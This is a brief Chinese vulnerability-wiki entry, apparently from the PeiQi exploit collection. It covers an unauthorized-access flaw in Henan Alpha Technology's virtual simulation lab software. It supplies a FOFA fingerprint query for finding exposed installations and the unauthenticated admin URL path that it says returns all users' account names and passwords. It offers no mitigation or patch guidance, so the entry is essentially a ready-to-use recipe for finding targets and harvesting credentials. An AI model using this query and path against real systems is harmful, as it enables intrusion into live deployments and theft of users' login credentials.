阿尔法科技 虚拟仿真实验室 未授权访问漏洞

漏洞描述

阿尔法科技 虚拟仿真实验室 存在未授权访问漏洞,通过访问构造的Url可以获取敏感信息

漏洞影响

[!NOTE]

虚拟仿真实验室

FOFA

[!NOTE]

body="河南阿尔法科技有限公司"

漏洞复现

未授权的Url为

/admin/student/studentlist.html?page=1

成功获取所有用户的账号密码信息

参考文章

http://www.0dayhack.net/index.php/1702/

PeiQi WiKi文库 all right reserved,powered by Gitbook文件更新时间: 2021-05-20 23:44:42

results matching ""

    No results matching ""